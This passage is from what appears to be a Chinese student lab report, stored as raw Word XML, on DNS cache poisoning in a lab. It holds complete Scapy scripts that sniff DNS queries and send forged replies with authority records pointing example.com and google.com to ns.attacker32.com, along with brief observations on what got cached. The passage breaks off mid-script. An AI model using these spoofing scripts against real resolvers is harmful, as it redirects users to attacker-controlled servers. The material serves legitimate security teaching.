        <w:t>pkt=sniff(iface='br-2d61e239ce80', filter=myFilter, prn=spoof_dns)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E0476A" w14:textId="77777777" w:rsidR="00880D75" w:rsidRPr="00880D75" w:rsidRDefault="00880D75" w:rsidP="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56242CED" w14:textId="44DC707D" w:rsidR="00725AD3" w:rsidRDefault="00725AD3" w:rsidP="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57D456EE" w14:textId="4920AC7F" w:rsidR="00725AD3" w:rsidRDefault="00725AD3" w:rsidP="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00725AD3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="00725AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ASK 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058651EB" w14:textId="306470E8" w:rsidR="00725AD3" w:rsidRPr="00725AD3" w:rsidRDefault="00725AD3" w:rsidP="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>清除本地D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>缓存，然后执行程序，结果如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D14A82E" w14:textId="42AC6CDD" w:rsidR="00725AD3" w:rsidRDefault="00725AD3" w:rsidP="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BD92CB4" wp14:editId="309DA774">
            <wp:extent cx="5274310" cy="39522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A2AD" w14:textId="41C59339" w:rsidR="00725AD3" w:rsidRDefault="00725AD3" w:rsidP="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E3D1F6E" wp14:editId="2F4A6470">
            <wp:extent cx="5274310" cy="3938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FCD3" w14:textId="379766D9" w:rsidR="00725AD3" w:rsidRDefault="00E35132" w:rsidP="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行程序代码与T</w:t>
      </w:r>
      <w:r>
        <w:t>ASK 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一致</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46516A93" w14:textId="34B57E24" w:rsidR="00B7215A" w:rsidRDefault="00C12AFA" w:rsidP="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结果如下，攻击数据已写入D</w:t>
      </w:r>
      <w:r>
        <w:t>NS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓存中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099E46FC" w14:textId="0D6E5069" w:rsidR="00B7215A" w:rsidRDefault="00C12AFA" w:rsidP="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C0F77FA" wp14:editId="14EAF2CD">
            <wp:extent cx="5274310" cy="1701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ACCA" w14:textId="60448EDB" w:rsidR="00B7215A" w:rsidRDefault="00B7215A" w:rsidP="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="412960B8" w14:textId="6B7041AA" w:rsidR="00B7215A" w:rsidRDefault="00B7215A" w:rsidP="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C941A42" w14:textId="68C0276C" w:rsidR="00B7215A" w:rsidRDefault="00B7215A" w:rsidP="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EB54515" w14:textId="657B59DF" w:rsidR="00B7215A" w:rsidRPr="00B7215A" w:rsidRDefault="00B7215A" w:rsidP="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B7215A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TASK 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48339C06" w14:textId="7EF56E1D" w:rsidR="00B7215A" w:rsidRDefault="00B7215A" w:rsidP="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="288E49DE" w14:textId="63C66948" w:rsidR="00B7215A" w:rsidRDefault="00573F58" w:rsidP="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先，清除本地D</w:t>
      </w:r>
      <w:r>
        <w:t>NS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器的缓存，然后执行攻击程序，结果如下，代码如下所示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04886581" w14:textId="77777777" w:rsidR="00573F58" w:rsidRDefault="00573F58" w:rsidP="00573F58">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAAC732" w14:textId="77777777" w:rsidR="00573F58" w:rsidRDefault="00573F58" w:rsidP="00573F58">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>from scapy.all import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A8D85A" w14:textId="77777777" w:rsidR="00573F58" w:rsidRDefault="00573F58" w:rsidP="00573F58">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>import sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4980D308" w14:textId="77777777" w:rsidR="00573F58" w:rsidRDefault="00573F58" w:rsidP="00573F58">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>NS_NAME = "example.com"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2CA7AE" w14:textId="77777777" w:rsidR="00573F58" w:rsidRDefault="00573F58" w:rsidP="00573F58">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>def spoof_dns(pkt):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4229ACE1" w14:textId="77777777" w:rsidR="00573F58" w:rsidRDefault="00573F58" w:rsidP="00573F58">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   if (DNS in pkt and NS_NAME in pkt[DNS].qd.qname.decode('utf-8')):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DA1884" w14:textId="77777777" w:rsidR="00573F58" w:rsidRDefault="00573F58" w:rsidP="00573F58">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     print(pkt.sprintf("{DNS: %IP.src% --&gt; %IP.dst%: %DNS.id%}"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70EB658E" w14:textId="77777777" w:rsidR="00573F58" w:rsidRDefault="00573F58" w:rsidP="00573F58">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">     ip = IP() # Create an IP object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A3DE1E" w14:textId="77777777" w:rsidR="00573F58" w:rsidRDefault="00573F58" w:rsidP="00573F58">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     ip.dst = pkt[IP].src</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568CDD2B" w14:textId="77777777" w:rsidR="00573F58" w:rsidRDefault="00573F58" w:rsidP="00573F58">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     ip.src = pkt[IP].dst</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750DA444" w14:textId="77777777" w:rsidR="00573F58" w:rsidRDefault="00573F58" w:rsidP="00573F58">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     udp = UDP() # Create a UPD object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2763C941" w14:textId="77777777" w:rsidR="00573F58" w:rsidRDefault="00573F58" w:rsidP="00573F58">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     udp.dport=pkt[UDP].sport</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2C8287" w14:textId="77777777" w:rsidR="00573F58" w:rsidRDefault="00573F58" w:rsidP="00573F58">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     udp.sport=pkt[UDP].dport</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58984C8F" w14:textId="77777777" w:rsidR="00573F58" w:rsidRDefault="00573F58" w:rsidP="00573F58">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     Anssec = DNSRR(rrname=pkt[DNS].qd.qname, type='A', ttl=259200, rdata='1.2.3.5') # Create an aswer record</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BDE9C8" w14:textId="77777777" w:rsidR="00573F58" w:rsidRDefault="00573F58" w:rsidP="00573F58">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     # The Authority Section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BE83B5" w14:textId="77777777" w:rsidR="00573F58" w:rsidRDefault="00573F58" w:rsidP="00573F58">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     NSsec1 = DNSRR(rrname='example.com', type='NS',ttl=259200, rdata='ns.attacker32.com')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CF9FBA" w14:textId="5FB90FFF" w:rsidR="00573F58" w:rsidRDefault="00573F58" w:rsidP="00573F58">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     NSsec2 = DNSRR(rrname='google.com', type='NS', ttl=2</w:t>
      </w:r>
      <w:r w:rsidR="0099699C">
        <w:t>592</w:t>
      </w:r>
      <w:r>
        <w:t>00, rdata='ns.attacker32.com')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2F8EC4" w14:textId="77777777" w:rsidR="00573F58" w:rsidRDefault="00573F58" w:rsidP="00573F58">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     Addsec1 = DNSRR(rrname='ns.attacker32.com', type='A', ttl=259200, rdata='10.9.0.153')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7784DA21" w14:textId="77777777" w:rsidR="00573F58" w:rsidRDefault="00573F58" w:rsidP="00573F58">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB1179A" w14:textId="2ABE9580" w:rsidR="00573F58" w:rsidRDefault="00573F58" w:rsidP="00573F58">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     dns = DNS(id=pkt[DNS].id, qd=pkt[DNS].qd, aa=1, rd=0, qr=1, qdcount=1, ancount=1, nscount=2, arcount=1, an=Anssec,ns=NSsec1/NSsec2, ar=Addsec1)# Create a DNS object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE35347" w14:textId="77777777" w:rsidR="00573F58" w:rsidRDefault="00573F58" w:rsidP="00573F58">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     spoofpkt = ip/udp/dns # Assemble the spoofed DNS packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFE8695" w14:textId="77777777" w:rsidR="00573F58" w:rsidRDefault="00573F58" w:rsidP="00573F58">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     send(spoofpkt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587E0062" w14:textId="77777777" w:rsidR="00573F58" w:rsidRDefault="00573F58" w:rsidP="00573F58">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>myFilter = "udp and dst port 53 "# Set the filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC1E2B2" w14:textId="74E18BFC" w:rsidR="00573F58" w:rsidRDefault="00573F58" w:rsidP="00573F58">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>pkt=sniff(iface='br-2d61e239ce80', filter=myFilter, prn=spoof_dns)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39092F57" w14:textId="118F4F2B" w:rsidR="00EF34A2" w:rsidRDefault="00EF34A2" w:rsidP="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35EFE8B7" wp14:editId="22FAFB81">
            <wp:extent cx="5274310" cy="37122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41D5" w14:textId="12EDB6C9" w:rsidR="00573F58" w:rsidRDefault="00573F58" w:rsidP="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>只有example</w:t>
      </w:r>
      <w:r>
        <w:t>.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的映射关系被写入到缓存中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DCED27" w14:textId="4F020652" w:rsidR="00EF34A2" w:rsidRDefault="00573F58" w:rsidP="007C4BB9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B2C40C" wp14:editId="461EC225">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>213360</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>38100</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="1402715"/>
            <wp:effectExtent l="0" t="0" r="2540" b="698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将D</w:t>
      </w:r>
      <w:r>
        <w:t>NS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置参数改成如下：</w:t>
      </w:r>
      <w:r w:rsidRPr="00573F58">
        <w:t>ns=NSsec2/NSsec1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，结果如图，</w:t>
      </w:r>
      <w:r w:rsidRPr="00573F58">
        <w:t>google.co</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidRPr="00573F58">
        <w:t>到attacker32.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的映射被存储到缓存中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3051DE56" w14:textId="7B7EEAC8" w:rsidR="00EF34A2" w:rsidRDefault="00EF34A2" w:rsidP="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37BFD0DC" w14:textId="44EE0CF0" w:rsidR="00EF34A2" w:rsidRDefault="00EF34A2" w:rsidP="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30492746" wp14:editId="446F1099">
            <wp:extent cx="5274310" cy="20618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302C" w14:textId="02EDB231" w:rsidR="00573F58" w:rsidRDefault="00573F58" w:rsidP="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>观察发现，D</w:t>
      </w:r>
      <w:r>
        <w:t>NS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓存只写入ns参数设置中的第一条，虽然能在A</w:t>
      </w:r>
      <w:r>
        <w:t>UTHORITY SECTION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中同时映射，但映射关系只有第一条会被存储到缓存中去。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D9BC51" w14:textId="031A6A51" w:rsidR="00573F58" w:rsidRDefault="00573F58" w:rsidP="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="276D456C" w14:textId="77C9B975" w:rsidR="00573F58" w:rsidRPr="00BA2083" w:rsidRDefault="00BA2083" w:rsidP="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA2083">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TASK 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DCC294" w14:textId="00217206" w:rsidR="00BA2083" w:rsidRDefault="00BA2083" w:rsidP="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E2003E2" w14:textId="7C344C4B" w:rsidR="00BA2083" w:rsidRDefault="00493CCE" w:rsidP="007C4BB9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先清除本地D</w:t>
      </w:r>
      <w:r>
        <w:t>NS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器缓存，然后执行新的攻击程序，代码如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D73D05" w14:textId="77777777" w:rsidR="00493CCE" w:rsidRDefault="00493CCE" w:rsidP="00493CCE">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514CF35C" w14:textId="77777777" w:rsidR="00493CCE" w:rsidRDefault="00493CCE" w:rsidP="00493CCE">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>from scapy.all import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1020E4B8" w14:textId="77777777" w:rsidR="00493CCE" w:rsidRDefault="00493CCE" w:rsidP="00493CCE">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>import sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F32795" w14:textId="77777777" w:rsidR="00493CCE" w:rsidRDefault="00493CCE" w:rsidP="00493CCE">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>NS_NAME = "www.example.com"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03425693" w14:textId="77777777" w:rsidR="00493CCE" w:rsidRDefault="00493CCE" w:rsidP="00493CCE">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>def spoof_dns(pkt):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FFF7E8" w14:textId="77777777" w:rsidR="00493CCE" w:rsidRDefault="00493CCE" w:rsidP="00493CCE">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   if (DNS in pkt and NS_NAME in pkt[DNS].qd.qname.decode('utf-8')):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D64318" w14:textId="77777777" w:rsidR="00493CCE" w:rsidRDefault="00493CCE" w:rsidP="00493CCE">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     print(pkt.sprintf("{DNS: %IP.src% --&gt; %IP.dst%: %DNS.id%}"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D8C8F5" w14:textId="77777777" w:rsidR="00493CCE" w:rsidRDefault="00493CCE" w:rsidP="00493CCE">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     ip = IP() # Create an IP object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A245A9" w14:textId="77777777" w:rsidR="00493CCE" w:rsidRDefault="00493CCE" w:rsidP="00493CCE">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     ip.dst = pkt[IP].src</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D571207" w14:textId="77777777" w:rsidR="00493CCE" w:rsidRDefault="00493CCE" w:rsidP="00493CCE">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     ip.src = pkt[IP].dst</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505B61C5" w14:textId="77777777" w:rsidR="00493CCE" w:rsidRDefault="00493CCE" w:rsidP="00493CCE">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     udp = UDP() # Create a UPD object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC2AA7E" w14:textId="77777777" w:rsidR="00493CCE" w:rsidRDefault="00493CCE" w:rsidP="00493CCE">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     udp.dport=pkt[UDP].sport</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33137B24" w14:textId="77777777" w:rsidR="00493CCE" w:rsidRDefault="00493CCE" w:rsidP="00493CCE">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     udp.sport=pkt[UDP].dport</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D67E5FA" w14:textId="77777777" w:rsidR="00493CCE" w:rsidRDefault="00493CCE" w:rsidP="00493CCE">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     Anssec = DNSRR(rrname=pkt[DNS].qd.qname, type='A', ttl=259200, rdata='1.2.3.5') # Create an aswer record</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EE6FC0" w14:textId="77777777" w:rsidR="00493CCE" w:rsidRDefault="00493CCE" w:rsidP="00493CCE">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     # The Authority Section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074200FB" w14:textId="77777777" w:rsidR="00493CCE" w:rsidRDefault="00493CCE" w:rsidP="00493CCE">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">     NSsec1 = DNSRR(rrname='example.com', type='NS',ttl=259200, rdata='ns.attacker32.com')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2C43B3" w14:textId="7CC1BA55" w:rsidR="00493CCE" w:rsidRDefault="00493CCE" w:rsidP="00493CCE">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     NSsec2 = DNSRR(rrname='example.com', type='NS', ttl=259200, rdata='ns.example.com')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2DEB70" w14:textId="77777777" w:rsidR="00493CCE" w:rsidRDefault="00493CCE" w:rsidP="00493CCE">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     Addsec1 = DNSRR(rrname='ns.attacker32.com', type='A', ttl=259200, rdata='10.9.0.153')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAE177A" w14:textId="77777777" w:rsidR="00493CCE" w:rsidRDefault="00493CCE" w:rsidP="00493CCE">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     Addsec2 = DNSRR(rrname='ns.example.com', type='A', ttl=259200, rdata='5.6.7.8')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C7A3D2" w14:textId="77777777" w:rsidR="00493CCE" w:rsidRDefault="00493CCE" w:rsidP="00493CCE">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     Addsec3 = DNSRR(rrname='www.facebook.com', type='A', ttl=259200, rdata='3.4.5.6')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E49CEA" w14:textId="77777777" w:rsidR="00493CCE" w:rsidRDefault="00493CCE" w:rsidP="00493CCE">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22646685" w14:textId="4E3370F6" w:rsidR="00493CCE" w:rsidRDefault="00493CCE" w:rsidP="00493CCE">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     dns = DNS(id=pkt[DNS].id, qd=pkt[DNS].qd, aa=1, rd=0, qr=1, qdcount=1, ancount=1, nscount=2, arcount=3, an=Anssec,ns=NSsec</w:t>
      </w:r>
      <w:r w:rsidR="00880D75">
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>/NSsec</w:t>
      </w:r>
      <w:r w:rsidR="00880D75">
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>, ar=Addsec1/Addsec2/Addsec3)# Create a DNS object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BDC7EC" w14:textId="77777777" w:rsidR="00493CCE" w:rsidRDefault="00493CCE" w:rsidP="00493CCE">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     spoofpkt = ip/udp/dns # Assemble the spoofed DNS packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAB66C7" w14:textId="77777777" w:rsidR="00493CCE" w:rsidRDefault="00493CCE" w:rsidP="00493CCE">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     send(spoofpkt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4992A30E" w14:textId="77777777" w:rsidR="00493CCE" w:rsidRDefault="00493CCE" w:rsidP="00493CCE">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>myFilter = "udp and dst port 53 "# Set the filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5FE090" w14:textId="10F87FB9" w:rsidR="00493CCE" w:rsidRDefault="00493CCE" w:rsidP="00493CCE">
